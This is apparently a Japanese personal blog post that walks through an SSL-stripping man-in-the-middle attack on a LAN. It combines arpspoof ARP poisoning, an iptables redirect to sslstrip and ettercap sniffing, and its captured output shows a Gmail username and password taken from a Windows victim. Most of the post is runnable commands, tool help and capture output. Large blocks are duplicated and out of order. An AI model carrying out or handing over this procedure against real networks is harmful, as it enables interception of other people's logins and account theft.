SSL通信の解読に ssldump を使ってたけど、なんか他にいいツールないかなーとさがしていた。。。
sslstrip , arpspoof , ettercap を使ってSSL通信を解読してみた。
root@bt:# vi /etc/etter.conf
arpspoof -t ターゲットのIP デフォルト ゲートウェイ
- パケットキャプチャ
root@bt:~# ettercap -T -q -i eth0
Windows ( IE ) で、gmail にログイン。
ユーザ名、パスワードがみえる。 ( sslsttrip マシン )
root@bt:~# ettercap -T -q -i eth0
HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
html 形式でみることもできる ( -V html )
root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE
GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP
-V, --visual
Use this option to set the visualization method for the packets
to be displayed.
FORMAT may be one of the following:
hex Print the packets in hex format.
example:
the string "HTTP/1.1 304 Not Modified" becomes:
0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1
304 Not
0010: 204d 6f64 6966 6965 64 Modified
ascii Print only "printable" characters, the others are dis-
played as dots '.'
text Print only the "printable" characters and skip the oth-
ers.
ebcdic Convert an EBCDIC text to ASCII.
html Strip all the html tags from the text. A tag is every
string between < and >.
example:
, but the following
will not be displayed.
This is the title, but the following will not be dis-
played.
utf8 Print the packets in UTF-8 format. The encoding used
while performing the conversion is declared in the
etter.conf(5) file.
トリックは中間者攻撃 ( Man in The Middle Attack ) で SSL通信をぬすんで、解読してる。
sslstrip , arpspoof , ettercap を使ってSSL通信を解読してみた。
SSLクライアント: 192.168.1.2 ( Windows )
sslstrip , arpspoof , ettercap マシン: 192.168.1.3 ( BackTrack Linux 4 final )
Internet --- Router 1.254 --- 1.3 Windows
--- 1.2 eth0 BackTrack Linux
[ sslstrip マシン ]
下記2行のコメントを外す
- ethercap の設定ファイルを修正
ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks
root@bt:# vi /etc/etter.conf
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- forwarding を有効にする
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1
- arpspoof を実行
arpspoof -t ターゲットのIP デフォルト ゲートウェイ
root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254
OPTIONS
-i interface
Specify the interface to use.
-t target
Specify a particular host to ARP poison (if not specified, all hosts on
the LAN).
host Specify the host you wish to intercept packets for (usually the local
gateway).
- あて先ポートが 80 を 10000 ポートにリダイレクト ( sslstrip が 10000 番ポートでリッスンしていて、SSLトラフィックを strip する )
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip 起動
root@bt:~# sslstrip -a -f -k
sslstrip 0.6 by Moxie Marlinspike running...
- sslstrip は 10000番ポートでリッスン
root@bt:~# lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sslstrip 6188 root 4u IPv4 23821 TCP *:webmin (LISTEN)
root@bt:~# sslstrip --help
sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip
Options:
-w , --write= Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l , --listen= Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
- パケットキャプチャ
root@bt:~# ettercap -T -q -i eth0
Windows ( IE ) で、gmail にログイン。
ユーザ名、パスワードがみえる。 ( sslsttrip マシン )
root@bt:~# ettercap -T -q -i eth0
HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
html 形式でみることもできる ( -V html )
root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE
GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP
-V, --visual
Use this option to set the visualization method for the packets
to be displayed.
FORMAT may be one of the following:
hex Print the packets in hex format.
example:
the string "HTTP/1.1 304 Not Modified" becomes:
0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1
304 Not
0010: 204d 6f64 6966 6965 64 Modified
ascii Print only "printable" characters, the others are dis-
played as dots '.'
text Print only the "printable" characters and skip the oth-
ers.
ebcdic Convert an EBCDIC text to ASCII.
html Strip all the html tags from the text. A tag is every
string between < and >.
example:
, but the following
This is the title, but the following will not be dis-
played.
utf8 Print the packets in UTF-8 format. The encoding used
while performing the conversion is declared in the
etter.conf(5) file.
トリックは中間者攻撃 ( Man in The Middle Attack ) で SSL通信をぬすんで、解読してる。
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.